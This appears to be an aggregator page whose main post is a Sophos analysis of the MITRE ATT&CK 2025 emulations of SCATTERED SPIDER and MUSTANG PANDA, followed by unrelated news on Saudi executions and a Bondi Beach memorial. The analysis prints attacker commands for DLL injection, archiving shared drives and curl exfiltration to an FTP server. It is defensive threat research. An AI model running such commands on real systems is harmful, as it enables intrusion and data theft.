Category: Uncategorized

  • Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations

    Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations


    Each year, several security solution providers – including Sophos – sign up for MITRE’s ATT&CK Enterprise Evaluations, a full-scale cyber attack emulation covering one or more scenarios based on real-world threat actors and their tactics, techniques, and procedures (TTPs).

    The evaluation is designed to provide a realistic (and transparent – the results are publicly available) appraisal of security solutions’ performances, based on end-to-end attack chains which include initial access, persistence, lateral movement, and impact. Emulations typically include a multi-device ‘customer’ environment, complete with endpoints, servers, domain-joined devices, and Active Directory-managed users.

    2025 marked the fifth year of Sophos participating – and, as we did last year, we wanted to provide some insight into what this year’s assessment (which came complete with multiple Game of Thrones references) entailed, and to show how true to life it actually is. In particular, we’ll dive into the realism of the tooling, nuances in the testing methodology, and Sophos’ protection and detection capabilities. While we can’t cover everything, due to the sheer number of steps in each scenario, we’ll discuss a selection, highlighting the depth and accuracy of the emulations.

    For the 2025 evaluation, MITRE selected two threat categories: a cybercriminal threat actor based on SCATTERED SPIDER (GOLD HARVEST), and a China-based threat actor based on MUSTANG PANDA (BRONZE PRESIDENT). Both are significant and prominent threats. The former, being predominantly financially motivated, is known for extortion and ransomware, and has been linked to several high-profile attacks in recent years – including a ransomware attack against a UK retailer, a data breach targeting an Australian airline, and attacks against large US casino and resort operators. The latter threat actor is focused on espionage and information theft, and has targeted multiple government and non-government organizations across several countries since at least 2012.

    MITRE’s SCATTERED SPIDER emulation comprised one scenario: a threat actor acquiring initial access and then proceeding along the entire attack chain, with the added complexity of pivoting from an on-premises environment to cloud infrastructure. The MUSTANG PANDA emulation, on the other hand, consisted of two separate sub-scenarios. The first (dubbed ORPHEUS) involved the entire attack chain, whereas the second (PERSEUS) covered initial access, collection, and exfiltration. Each sub-scenario featured a distinct malware family, both associated with the real-world threat actor.

    The first scenario involved an emulated cybercriminal threat actor, based on real-world threat intelligence relating to SCATTERED SPIDER. This scenario covered the entire attack chain, including initial access, discovery, lateral movement, credential access, persistence, collection, and exfiltration.

    Notably, this scenario involved the threat actor moving laterally from their initial compromise of an on-premise environment to an Amazon Web Services (AWS)-hosted environment. SCATTERED SPIDER is one of a limited number of cybercrime groups known to target and modify cloud infrastructure, and which uses a wide and adaptive selection of open source and publicly available tools.

    The TTPs selected for the cybercriminal scenario were drawn from a wide range of public reporting, providing MITRE with flexibility in their emulation of SCATTERED SPIDER and interpretation of this reporting. Interestingly, the use of stealer malware – previously observed in SCATTERED SPIDER intrusions – was absent in the scenario.

    Initial access

    The threat actor began their attack by sending a spearphishing email to the user tlannister, from the address it@kingslanding-it[.]net. Researchers have previously observed SCATTERED SPIDER impersonating targeted organisations’ brands in phishing campaigns, using the email address format [.]net format, and SCATTERED SPIDER is known to use varied phishing techniques in combination with Adversary-in-the-Middle (AiTM) attacks.

    As for the email itself, it contained a link to a malicious AiTM site. The subject was “ACTION: SSO Updates Completed – Reauthentication Needed,” likely designed to create a sense of urgency, and to prime the recipient to accept the subsequent authentication prompt on the AiTM site as valid.

    When tlannister authenticated to the AiTM site, the threat actor obtained valid static credentials and Single Sign On (SSO) session cookies. Replaying the stolen cookies provided access to the SSO solution, with a valid account for the organization.

    Next, the threat actor enrolled their device in the SSO solution (something that researchers have seen SCATTERED SPIDER do). They then successfully connected to the host dragongate via Remote Desktop (RDP), and gained access to Outlook Web Access (OWA), indicating a valid SSO session.

     

    image2.png

    Figure 1: Sophos XDR detections showing cookies stolen using session replay being used for authentication and device registration

     

    Discovery

    Via their RDP session on the dragongate host, the threat actor then executed several discovery commands using cmd.exe:

    • whoami: returns active user’s domain and username
    • ping google.com: checks external network connectivity
    • wmic product get name, version: enumerates installed software, including security products; versions may indicate patch levels and possible vulnerabilities
    • nltest /dclist: lists Active Directory (AD) domain controllers
    • nltest /domain_trusts: lists trusted AD domains
    • ping redkeep.kingslanding.net: ‘redkeep’ is the domain controller, identified from listing Active Directory domain controllers

    It’s worth noting that several of these commands were also executed during legitimate administrator activity elsewhere in this scenario. In themselves, these commands did not necessarily indicate malicious activity, but, in our assessment warranted investigation nonetheless, owing to the context. For example, some nltest commands were executed in the context of a PowerShell process, run by a user logged in via RDP from an external IP address, and were commands that were rarely executed on that device.

    Next, the threat actor downloaded the Active Directory enumeration tool ADExplorer from the Microsoft SysInternals site using Firefox, then launched the tool to explore administrator groups. SCATTERED SPIDER is known to have downloaded ADExplorer, and other publicly available tools, from their original source sites.

     

    image3.png

    Figure 2: The threat actor uses ADExplorer.exe to list members of the Domain Admins group

    The threat actor proceeded to access the Z:\ shared drive on a file server named CITADEL (this drive was already mapped for the tlannister user). Files opened by the threat actor included a network architecture diagram.

    While there is limited public information on SCATTERED SPIDER’s use of shared drives, researchers have reported on the threat actor searching SharePoint instances. That being said, its flexible tactics and tooling suggest that accessing shared drives is credible in the scenario.

    We also noted that the threat actor in this scenario created an inbox rule to delete emails with the keyword AirByte. Public reporting indicates that SCATTERED SPIDER has used various Extract, Transform, Load (ETL) tools, including AirByte, to synchronize and exfiltrate data from targeted environments. Researchers have also found that the threat actor has anticipated future AirByte configuration changes that could trigger an investigation, and suppressed notification change alerts using email rules.

    Lateral movement, persistence, and credential access

    The cookies previously stolen by the threat actor enabled them to access the organization’s SSO system as the user tlannister. This access provided the attacker with access to integrated applications, including the AWS console, without requiring a new authentication event on the organization’s identity provider platform.

    We observed that in AWS CloudTrail, an AWS security monitoring and governance tool, there was an AwsConsoleSignIn event, indicating that a user had assumed an SSO role via the Authentik SAML (Security Assertion Markup Language) provider – the open-source SSO system used by the targeted organization in this scenario.

     

    image4.png

    Figure 3: Sophos XDR (Taegis) detections for a user performing AWS discovery actions after single-factor authentication via SAML

    There were several suspicious aspects of this console login:

    • A login via SAML, but without multifactor authentication (MFA)
    • A user login from a previously unseen IP address
    • A console login, immediately followed by AWS cloud service discovery activity

    The attacker then enumerated several AWS services – something SCATTERED SPIDER is known to do – including Billing and Cost Management (likely to establish what types of services the targeted organization was using), Identity and Access Management (IAM) users & groups, S3 buckets, EC2 network information, and EC2 instance information. This rapid enumeration of AWS services by a single user triggered a detection (AWS Console Enumeration Activity).

    Following this enumeration, the threat actor then began to remotely execute commands. They achieve this using AWS Systems Manager, which allows command execution on EC2 instances with the AWS Systems Manager Agent deployed.

    Specifically, the threat actor ran the AWS Systems Manager document AWS-RunPowerShellScript to execute a PowerShell command on multiple instances. AWS CloudTrail records SendCommand events from Systems Manager. While parameters for SendCommand documents are redacted by default in AWS CloudTrail logs for security reasons, EDR telemetry can be used to determine the command executed. The targeted instances for the PowerShell command were the on-premise Windows hosts, rather than the Linux cloud instance hosts. However, it’s worth noting that there was some crossover here; the on-premises hosts were actually instances in the same AWS organization as the cloud instances, which is an atypical environment.

    Next, the threat actor ran the AWS Systems Manager document AWS-GatherSoftwareInventory to collect detailed software inventory information from managed AWS EC2 instances – including installed applications, processes, updates and patches. This information is useful to an attacker as it can tell them where they are likely to find information relevant to their objectives. In this scenario, the attacker was interested in systems containing confidential business information.

    While public reporting on SCATTERED SPIDER describes its use of AWS Systems Manager’s AWS-GatherSoftwareInventory document to profile cloud instance hosts, we’re not aware of any coverage relating to its use of SendCommand AWS-RunPowerShellScript for remote command execution on cloud instance hosts. However, there are reports of SCATTERED SPIDER using the equivalent Azure Run Command.

    The threat actor then established persistent access to AWS by creating a new IAM user ahightower, via AWS IAM CreateUser, and attached a user policy to the new user via AWS IAM AttachUserPolicy.

    This attached policy provided administrative privileges. Attaching an administrative policy to a new AWS IAM user is rare, and therefore warrants investigation. Researchers have observed SCATTERED SPIDER creating AWS IAM users with similar naming conventions to existing legitimate users, and then assigning access keys to enable programmatic access.

    The attacker next used AWS federation features to pivot from the AWS Command Line Interface (CLI) access keys to AWS Console access for the new user. This technique is implemented in the open-source AWS Consoler tool, which SCATTERED SPIDER has used in the past.

     

    image5.png

    Figure 4: Sophos XDR (Taegis) detection for the threat actor using AWS Federation features to create an interactive session

    Subsequently, the attacker provisioned a new EC2 instance named goldroad for remote access. The Sophos EDR agent was automatically deployed to this new instance using a CloudFormation stack, providing visibility of the attacker’s activity on their new bastion host.

    The initial remote access mechanism used by the threat actor was EC2 Serial Console with SSH (SCATTERED SPIDER has been observed leveraging Azure’s serial console feature for remote access). EC2 Serial Console access uses a virtual serial port that is independent of the instance’s network access, and which does not require configuration of the virtual private cloud’s (VPC) security groups. Serial console access does not generate standard remote access network traffic.

     

    image6.png

    Figure 5: Sophos XDR (Taegis) detection showing an SSH public key being uploaded to an EC2 instance for remote access via Instance Connect

    The threat actor then performed discovery activity to identify secrets providing access to targeted business information, by invoking the AWS Secrets Manager ListSecrets command – again, something that SCATTERED SPIDER has done in the past.

    We observed calls to BatchGetSecretValue and GetSecretValue, with requestParameters indicating that a Gitlab Personal Access Token secret for the user atargaryen was the target. The attacker decrypted this secret by calling DecryptValue.

    Next, the threat actor downloaded two tools designed for secret discovery: trufflehog and jecretz. As previously noted, SCATTERED SPIDER often downloads publicly available and open-source tools from their original source, including these two.

    trufflehog is a credential / secrets scanner that supports scanning on a large number of platforms. Here, the threat actor executed it against Gitlab, authenticated using a Gitlab personal access token (PAT), likely acquired from AWS Secrets Manager.

    jecretz is described as a “Jira Secrets Hunter,” designed to “find credentials and sensitive contents in Jira tickets.” In the scenario, the threat actor executed jecretz against a Wekan Kanban instance using tlannister’s static credentials – likely obtained from the initial phishing attack.

    The threat actor then installed the remote monitoring & management tool Tactical RMM on multiple on-premise hosts, using AWS Systems Manager’s AWS-RunPowerShellScript document. SCATTERED SPIDER is known to use a variety of remote monitoring and management tools, including the open-source Tactical RMM.

    The URL for the Tactical RMM configuration impersonated the kingslanding domain. Impersonating targeted organizations is, as mentioned previously, also a tactic that researchers have observed SCATTERED SPIDER using.

     

    image7.png

    Figure 6: Sophos XDR detection showing Tactical RMM installation via AWS Systems Manager document AWS-RunPowerShellScript, with a configuration domain kingslanding-hr[.]com

    Collection and exfiltration

    Towards the end of the scenario, the threat actor prepared to exfiltrate data via the cloud infrastructure. They deployed the wstunnel tool (downloaded from the tool’s GitHub repository, again consistent with SCATTERED SPIDER’s documented behaviors) to their goldroad instance.

    wstunnel uses outbound WebSocket protocol traffic to bypass firewalls and proxies. AWS EC2 VPC (Virtual Private Cloud) default security groups allow all outbound traffic by default, but do not allow remote inbound connections that are necessary for direct remote access methods like SSH or RDP. The use of WebSockets for the tunnel therefore does not require additional VPC security group configuration, avoiding logged events in AWS CloudTrail.

     

    image8.png

    Figure 7: Sophos XDR (Taegis) process telemetry showing the wstunnel client process using WebSockets to connect to a remote server

    The threat actor used the wstunnel tunnel to connect to their goldroad instance via SSH, rather than the EC2 serial console. Public reporting on SCATTERED SPIDER intrusions describes the use of multiple SSH tunnelling tools, including OpenSSH and RevShell.

    From the tunnelled SSH session, the threat actor executed the AirByte configuration utility abctl to discover platform status and credentials; as noted previously, SCATTERED SPIDER is known to use AirByte and similar tools for exfiltration.

    Using AirByte, the threat actor staged files from the target cloud-hosted Gitlab and Wekan systems to an S3 bucket. As covered above, email notifications of AirByte configuration changes were suppressed by an email deletion rule previously configured by the threat actor.

    The attacker then downloaded the CyberDuck file browser and transfer utility (a tool researchers have described SCATTERED SPIDER using in real-world campaigns) to an on-premise host, using Firefox, and transferred files from the staging S3 bucket in the targeted organization’s AWS account to an attacker-controlled S3 bucket in another AWS account.

     

    image8_c02110.png

    Figure 8: Sophos XDR (Taegis) detection for suspected data exfiltration from S3, based on rapid retrieval of multiple objects

    The second scenario emulated a China-based threat actor, based on real-world threat intelligence relating to MUSTANG PANDA (BRONZE PRESIDENT). There were two distinct sub-scenarios within this wider scenario, covering three distinct attack tools used by this threat actor.

    The first sub-scenario (steps 1-6), ORPHEUS, covered the entire attack chain including initial access, discovery, lateral movement, credential access, persistence, collection, and exfiltration. The malware used in the ORPHEUS sub-scenario is very similar to TONESHELL, a backdoor reported earlier in 2025, while the VSCode tunnel abuse resembled an approach described in 2024, during a campaign in which a threat actor targeted government entities in Southeast Asia.

    Unlike previous years, steps 7-9 of Scenario 2 featured a separate sub-scenario (PERSEUS), covering initial access, collection, and exfiltration. The PERSEUS execution chain emulated the PlugX malware and the more recent ‘SmugX’ (PlugX plus HTML smuggling) attack chains.

    ORPHEUS (Steps 1-6)

    Initial access and defense evasion

    The initial access stage began with a malicious Office document, sent as an email attachment. This document (Strategic Competition with Pentos – Assessing Braavos Competitiveness Beyond Essos.docx) contained an embedded link that led to download of the archive file 250325_Pentos_Board_minutes.rar.

    This archive file contained a LNK file (Essos Competitiveness Brief.lnk) which executed the binary EssosUpdate.exe – a legitimate Windows application (wsdebug_host.exe) that sideloaded a malicious DLL, wsdapi.dll. This DLL acted as a loader for the ORPHEUS payload.

    EssosUpdate.exe then re-executed wsapi.dll using regsvr.exe, with the command:

    C:\Windows\System32\regsvr32.exe /s "C:\Users\htargaryen\Downloads\wsdapi.dll"

    regsvr32.exe spawned C:\Windows\System32\waitfor.exe Event183785251387 and then used mavinject to inject wsdapi.dll into waitfor.exe:

    C:\Windows\System32\mavinject.exe 8344 /INJECTRUNNING "C:\Users\htargaryen\Downloads\wsdapi.dll"

    Based on the attack chain, we assessed that this sub-scenario was emulating MUSTANG PANDA/BRONZE PRESIDENT and the TONESHELL malware. For instance, the execution of the LNK file appeared similar to that described in some reporting, which specifically calls out that:

    Mustang Panda employs DLL sideloading techniques, typically bundling malicious tools inside RAR archives paired with legitimate, signed binaries.

    LNK file lures and DLL sideloading have long been popular techniques associated with MUSTANG PANDA. For instance, in 2022, Secureworks (now a Sophos company) reported that:

    The malware is embedded within RAR archive files. Opening the archive on a Windows computer with default settings displays a Windows shortcut (LNK) file.

    To execute the malware, the recipient must click the Windows shortcut file. The shortcut executes a renamed legitimate file contained in the eighth hidden folder. Alongside the legitimate file is a malicious DLL and an encrypted payload file.

    A large part of this attack chain emulation appeared to be directly linked to Trend Micro’s report on TONESHELL. For instance, we observed the following similarities:

    • The same sideload -> regsvr.32exe -> mavinject.exe -> waitfor.exe injection chain (waitfor.exe Event19030000000 was used in the real-world attack; waitfor.exe Event183785251387 in the emulation)
    • Both samples implemented custom exception handlers
    • Both samples used the ws2_32 send API for C2 communication
    • Both samples decrypted and executed shellcode once running in their target process.

    Discovery

    For the discovery step, MITRE opted to only execute a handful of commands from the injected C2 process (waitfor.exe).

    netstat -anop tcp
    ipconfig /all
    mswin1.exe 10.55.4.0/24

    These three discovery commands were likely intended to represent how the adversary discovered the file servers/ domain controller and all workstations on the environment. In a real-world attack, we would typically expect to see more detailed enumeration occurring at this stage – although the paucity of commands could have been a reference to MUSTANG PANDA’s stealth and evasive capabilities.

    The usage of mswin1.exe ( SharpNBTScan, a NetBIOS scanning tool) in this step was similar to the approach described in Unit 42’s report on Stately Taurus. In that campaign, the attacker used SharpNBTScan renamed as win1.exe.

    Lateral movement, persistence, and credential access

    The ORPHEUS threat actor used PsExec for lateral movement, to drop and execute the script CodeHelper.bat. This batch file established a secondary C2 channel via a Visual Studio Code (VSCode) Tunnel.

    VSCode abuse is a relatively recent technique that researchers have previously attributed to MUSTANG PANDA. For instance, in September 2024, Unit 42 reported on the threat actor using code tunnels for C2.

    Lateral movement in the ORPHEUS scenario occurred from the initially compromised endpoint to the domain controller, using the same account. While it is possible that a domain admin account could be initially compromised, it is somewhat atypical to see the attack move from initial access straight to a domain controller, without any credential theft or privilege escalation. However, this aspect of the emulation may reflect the fact that MUSTANG PANDA’s lures are often highly targeted (for instance, focusing on government officials).

    Once the code tunnel was established, the ORPHEUS threat actor stole a copy of NTDS.dit using vssadmin to create a shadow copy of the file, and cmd.exe to copy it to the originally compromised machine. The SYSTEM registry hive was also dumped using reg.exe, as this contains the boot key needed to decrypt NTDS.dit.

    For persistence, the ORPHEUS threat actor created a code tunnel on the originally compromised machine through a scheduled task named AccessoryInputServices.

    We observed several similarities between the TTPs in this step and Unit 42’s reporting:

    • startcode.bat was used in the real-world attack to execute the code tunnel; MITRE used CodeHelper.bat
    • PsExec was used for lateral movement
    • NTDS.dit dumping
    • A similar naming convention for the scheduled task name (WindowsEdgeUpdateServices in the real-world attack, AccessoryInputServices in the simulation)

    Collection and exfiltration

    The ORPHEUS threat actor executed WinRAR through the code tunnel to collect sensitive data:

    "C:\Program Files\WinRAR\rar.exe" a -r -v250m -hpj5Tft5lLFFcQK -x*\appdata\ -x*\ProgramData\* -x*\Recovery\* "-x*\System Volume Information\*" -x*\$RECYCLE.BIN\* "-x*\Program Files\*" "-x*\Program Files (x86)\*" -x*\Windows\* -x*\Python312\* -x*\crash_dumps\* -x*\PerfLogs\* -n@C:\Users\htargaryen\Downloads\files.txt C:\Windows\Temp\A.rar \\10.55.3.105\A$\*

    The command executed here is similar to that described by Unit 42:

    rar.exe a -r -v250m -x*\appdata\  [email protected] .rar \\\D$\*

    Both commands read the file collection pattern from a txt file, and target the remote share drives of network hosts.

    For exfiltration, a renamed version of curl was dropped and executed to exfiltrate the archive files to a remote FTP server.

    "C:\Program Files\Microsoft VS Code\prpbg.dat.bak.1" -T "{C:\\windows\\temp\\C.rar,C:\\windows\\temp\\E.rar,C:\\windows\\temp\\F.rar,C:\\windows\\temp\\G.rar,C:\\windows\\temp\\H.rar,C:\\windows\\temp\\J.rar}" ftp://ftp_user:Gracious-Coat@[IP]/do/ --ftp-create-dirs

    This approach is similar to previously observed MUSTANG PANDA behavior:

    • Renaming curl and dropping it to C:\Programdata\IDM\log.log
    • Exfiltrating RAR archives of sensitive data to an attacker-controlled FTP server

    PERSEUS (steps 7-9)

    Steps 7-9 consisted of a separate sub-scenario (PERSEUS), where we observed initial access again on a new host – followed by collection, exfiltration, and indicator removal.

    Initial access

    The PERSEUS threat actor achieved initial access using a malicious link delivered via email. This email directed the user to an HTML smuggling web page. HTML smuggling has gained popularity as a method to evade network-based detections. Researchers have previously observed MUSTANG PANDA using HTML smuggling to deliver PlugX malware (in a campaign known as ‘SmugX’).
    The HTML smuggling code used by MITRE (Figure 9) contains multiple similarities to the example in the Check Point article linked above.

     

    image9.png

    Figure 9: HTML smuggling code used in the PERSEUS sub-scenario

    Both implementations were heavily obfuscated and made use of the window.atob function to obfuscate function calls.

    Additionally, both implementations hid the invocation of createObjectURL by using identical obfuscated strings, which were concatenated slightly differently. MITRE used ‘Y3JlYX’+’RlT2Jq’+’ZWN0VV’+’JM’, whereas MUSTANG PANDA used ‘Y3JlYXRl’ + ‘T2JqZWN’ + ‘0VVJM’. This string decodes to “createObjectURL”, used in HTML smuggling to create an object URL for the payload.

    In the PERSEUS sub-scenario, HTML smuggling led to the download of an MSI file named 2025p2.msi. When executed, this file installed an emulation of PlugX through sideloading and dynamic code execution.

    Here’s a brief overview of the infection chain:

    1. 2025p2.msi dropped gup.exe, WinGUpdate.dat (the PlugX payload) and libcurl.dll (the PlugX loader) to disk
    2. The msi installation then executed gup.exe which sideloaded libcurl.dll
    3. libcurl.dll loaded and decrypted WinGUpdate.dat, which led to execution of the PlugX payload
    4. The PlugX payload communicated with the attacker’s C2 server
    5. A decoy PDF (Meeting Invitation.pdf) opened and was displayed to the user
    6. The PERSEUS threat actor established persistence through the creation of a run key (WinGupSvc).

    As before, this approach contains several similarities to that detailed in Check Point’s coverage:

    • Both MSI installers were delivered via HTML smuggling
    • Both installers executed a PlugX loader through sideloading
    • Both loaders read the final RC4 encrypted payload from a .DAT file (data.dat in the real-world attack, WinGUpdate.dat in the emulation)
    • Both implementations presented the user with a decoy PDF document
    • Both implementations established persistence through a registry run key.

    We also noted a disparity: the MITRE emulation used gup.exe and libcurl.dll for sideloading, whereas the real-world attack involved robotaskbaricon.exe and RoboForm.dll. However, while the emulation differed from the SmugX campaign in this respect, we should note that researchers have observed MUSTANG PANDA using gup.exe and libcurl.dll to execute Cobalt Strike.

    Collection and exfiltration

    With the PlugX payload established, the emulation moved on to collection and exfiltration. Here, the PERSEUS threat actor used rar.exe to search and collect files based on the following extensions: pdf, doc, ppt, xls, png, jpg and jpeg.

    "C:\Program Files\WinRAR\rar.exe" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul -ta202504230000000 C:\Users\Public\Documents\b44d0xUT5BLOi.rar "C:\*.pdf" "C:\*.doc*" "C:\*.ppt*" "C:\*.xls*" "C:\users\*.png" "C:\users\*.jpg" "C:\users\*.jpeg"

    The threat actor proceeded to invoke curl.exe to exfiltrate the collected files (as a .rar file named b44d0xUT5BLOi.rar) to their FTP server.

    curl.exe -T C:\Users\Public\Documents\b44d0xUT5BLOi.rar ftp://ftp_user:Gracious-Coat@[IP]/dp/ --ftp-create-dirs

    This phase contained numerous similarities to the TONESHELL emulation in the OPRHEUS scenario: both WinRAR and curl were used to collect and exfiltrate the sensitive files, and the same FTP server was used for exfiltration. However, there were also some differences. In this sub-scenario, files were collected locally, and the native curl.exe (C:\Windows\System32\curl.exe) binary was executed.

    We don’t know why MITRE opted to retest using curl.exe (albeit this time as a living-off-the-land binary, or LOLbin) and rar.exe for this phase. As has been publicly reported, PlugX has native capabilities for collection and exfiltration that would likely be more evasive then executing LOLBINs already tested in the ORPHEUS sub-scenario.

    It’s possible that MITRE may have taken inspiration from a Trend Micro report on MUSTANG PANDA, in which researchers described how PUBLOAD executed a very similar curl command to exfiltrate data to an attacker-controlled FTP server:

    curl --progress-bar -C --T C:\programdata\IDM\.RAR ftp://:@

    This report also refers to PLUGX executing rar.exe via cmd.exe with a very similar collection pattern (although there is no reference to curl.exe being used for exfiltration):

    "RAR.exe a -r -m3 -tk -ed -dh -v4500m -hp -ibck -ta -n*.doc* -n*.rtf* -n*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -n*.dib* \"\\.RAR\" \"""

    Indicator removal

    In the final part of the PERSEUS sub-scenario, the malware was uninstalled using a self-clean up script which operates as follows:

    First, gup.exe (PlugX) dropped del_WinGupSvc.bat.

    Next, the batch file executed with a self-deletion command to remove the batch script itself once execution was complete:

    cmd /c "echo @echo off > C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo ping 127.0.0.1 -n 5 ^>nul >> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && echo del %~f0 >> C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat && C:\Users\ccole\AppData\Local\Temp\del_WinGupSvc.bat"

    The script uninstalled the persistence mechanism, the MSI package, and gup.exe:

    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinGupSvc" /f
    msiexec /uninstall "C:\Users\ccole\Downloads\2025p2.msi" /quiet
    taskkill /f /im gup.exe

    Here’s what we saw in Sophos XDR relating to this activity:

     

    image10.png

    Figure 10: Sophos XDR lineage showing the observed self-deletion phase

    This indicator removal step emulates the documented self-delete command in PlugX (identified as 0x1005). Its implementation is very similar to the details reported by Sekoia, where, as part of the self-delete process, researchers observed use of the batch script del_AsvastSvcpCP.bat.

    2025 marked the fifth year that Sophos has participated in MITRE ATT&CK Enterprise Evaluations. As in previous years, the focus on end-to-end attack chains and realism has made the evaluation an extremely worthwhile exercise in assessing our capabilities and those of other vendors. We also welcome MITRE’s emphasis on transparency.

    Like any kind of emulation, much of the value of these evaluations comes from how accurate and realistic their scenarios are. As with the 2024 evaluations, we noted that in a few, minor instances, MITRE’s scenarios deviated from what we know about real-world attacks. In some cases, this may have been due to unavoidable constraints related to developing and executing the scenarios. In others, it may have been the result of certain characteristics of the emulated threat actors. For instance, the MUSTANG PANDA threat actor, because of its nature and objectives, is more likely to operate in a controlled, coordinated manner. In contrast, SCATTERED SPIDER – believed to be more of a loose, amorphous collective – has more mutable and flexible TTPs, meaning that MITRE perhaps had more flexibility when designing the scenario. Regardless, in our assessment, the level of realism was high, and the overall resemblance to known campaigns and threat actors remains very strong – making this a valuable exercise.

    Transparent, realistic evaluations, in which multiple vendors participate, benefit not only vendors themselves, but also customers, and, as a result, wider society. We look forward to continuing to participate in these evaluations in the future, and to reporting our experiences and findings.



    Source link

  • Rights groups condemn new record number of executions in 2025

    Rights groups condemn new record number of executions in 2025


    Caroline HawleyDiplomatic correspondent

    ESOHR Issam al-ShazlyESOHR

    Egyptian fisherman Issam al-Shazly was executed on Tuesday after being convicted of drug-related charges

    Saudi Arabia has surpassed its record for the number of executions carried out annually for a second year in a row.

    At least 347 people have now been put to death this year, up from a total of 345 in 2024, according to the UK-based campaign group Reprieve, which tracks executions in Saudi Arabia and has clients on death row.

    It said this was the “bloodiest year of executions in the kingdom since monitoring began”.

    The latest prisoners to be executed were two Pakistani nationals convicted of drug-related offences.

    Others put death this year include a journalist and two young men who were children at the time of their alleged protest-related crimes. Five were women.

    But, according to Reprieve, most – around two thirds – were convicted of non-lethal drug-related offences, which the UN says is “incompatible with international norms and standards”.

    More than half of them were foreign nationals who appear to have been put to death as part of a “war on drugs” in the kingdom.

    The Saudi authorities have not responded to the BBC’s request for comment on the rise in executions.

    “Saudi Arabia is operating with complete impunity now,” said Jeed Basyouni, Reprieve’s head of death penalty for the Middle East and North Africa. “It’s almost making a mockery of the human rights system.”

    She described torture and forced confessions as “endemic” within the Saudi criminal justice system.

    Ms Basyouni called it a “brutal and arbitrary crackdown” in which innocent people and those on the margins of society have been caught up.

    Tuesday saw the execution of a young Egyptian fisherman, Issam al-Shazly, who was arrested in 2021 in Saudi territorial waters and said he had been coerced into smuggling drugs.

    Reprieve says that 96 of the executions were solely linked to hashish.

    “It almost seems that it doesn’t matter to them who they execute, as long as they send a message to society that there’s a zero-tolerance policy on whatever issue they’re talking about – whether it’s protests, freedom of expression, or drugs,” said Ms Basyouni.

    There has been a surge of drug-related executions since the Saudi authorities ended an unofficial moratorium in late 2022 – a step described as “deeply regrettable” by the UN human rights office.

    Speaking anonymously to the BBC, relatives of men on death row on drugs charges have spoken of the “terror” they’re now living in.

    One told the BBC: “The only time of the week that I sleep is on Friday and Saturday because there are no executions on those days.”

    Cellmates witness people they have shared prison life with for years being dragged kicking and screaming to their death, according to Reprieve.

    Reuters Crown Prince Mohammed bin Salman of Saudi Arabia attends the US-Saudi Investment Forum in Washington DC, (19 November 2025)Reuters

    Prince Mohammed bin Salman has loosened social restrictions while simultaneously silencing criticism

    The de facto ruler of Saudi Arabia, Mohammed bin Salman – who became crown prince in 2017 – has changed the country profoundly over the past few years, loosening social restrictions while simultaneously silencing criticism.

    In a bid to diversify its economy away from oil, he has opened Saudi Arabia up to the outside world, taken the religious police off the streets, and allowed women to drive.

    But the kingdom’s human rights record remains “abysmal”, according to the US-based campaign group Human Rights Watch, with the high level of executions a major concern. In recent years, only China and Iran have put more people to death, according to human rights activists.

    “There’s been no cost for Mohammed bin Salman and his authorities for going ahead with these executions,” said Joey Shea, who researches Saudi Arabia for Human Rights Watch. “The entertainment events, the sporting events, all of it is continuing to happen with no repercussions, really.”

    According to Reprieve, the families of those executed are usually not informed in advance, or given the body, or informed where they have been buried.

    The Saudi authorities do not reveal the method of execution, although it is believed to be either beheading or firing squad.

    In a statement sent to the BBC, the UN’s special rapporteur on extrajudicial, summary or arbitrary executions, Dr Morris Tidball-Binz, called for an immediate moratorium on executions in Saudi Arabia with a view to abolition, as well as “full compliance with international safeguards (including effective legal assistance and consular access for foreign nationals), prompt notification of families, the return of remains without delay and the publication of comprehensive execution data to enable independent scrutiny”.

    Amnesty International Abdullah al-Derazi (L) and Jalal al-Labbad (R)Amnesty International

    Abdullah al-Derazi and Jalal al-Labbad were executed in October and August respectively after being convicted of crimes they allegedly committed as minors

    Among the Saudi nationals executed this year were Abdullah al-Derazi and Jalal al-Labbad, who were both minors at the time of their arrest.

    They had protested against the government’s treatment of the Shia Muslim minority in 2011 and 2012, and participated in the funerals of people killed by security forces. They were convicted of terrorism-related charges and sentenced to death after what Amnesty International said were grossly unfair trials that relied on torture-tainted “confessions”. UN human rights experts had called for their release.

    The UN also condemned the execution in June of the journalist, Turki al-Jasser, who had been arrested in 2018 and sentenced to death on charges of terrorism and high treason based on writings he was accused of authoring.

    “Capital punishment against journalists is a chilling attack on freedom of expression and press freedom,” said Unesco’s Director-General, Audrey Azoulay.

    Reporters Without Borders said he was the first journalist to be executed in Saudi Arabia since Mohammed bin Salman came to power, although another journalist, Jamal Khashoggi, was murdered by Saudi agents at the Saudi consulate in Istanbul in 2018.

    Human Rights Watch Turki al-JasserHuman Rights Watch

    Journalist Turki al-Jasser was executed in June after seven years in detention

    Last December, UN experts wrote to the Saudi authorities to express concern over a group of 32 Egyptians and one Jordanian national who had been sentenced to death on drugs charges, and their “alleged absence of legal representation”. Since then, most of the group have been executed.

    A relative of one man put to death earlier this year said that he had told her that people were being “taken like goats” to be killed.

    The BBC has approached the Saudi authorities for a response to the allegations but has not received one.

    But in a letter dated January 2025 – in reply to concerns raised by UN special rapporteurs – they said that Saudi Arabia “protects and upholds” human rights and that its laws “prohibit and punish torture”.

    “The death penalty is imposed only for the most serious crimes and in extremely limited circumstances,” the letter stated. “It is not handed down or carried out until judicial proceedings in courts of all levels have been completed.”



    Source link

  • Minute’s silence held to remember Bondi Beach attack victims

    Minute’s silence held to remember Bondi Beach attack victims


    Katy Watson,Australia correspondentand

    Tiffanie Turnbull,Bondi Beach

    Reuters People in summer clothes mourn near floral tributes placed for victims and survivors of a deadly mass shootingReuters

    Mourners in Australia fell silent on Sunday in honour of the victims of the Bondi Beach attack.

    The memorial was part of a national day of reflection to mark a week since the shooting in which two gunmen opened fire on an event celebrating the Jewish festival of Hannukah.

    A 10-year-old girl, a British-born rabbi and a Holocaust survivor were among 15 people killed in the attack.

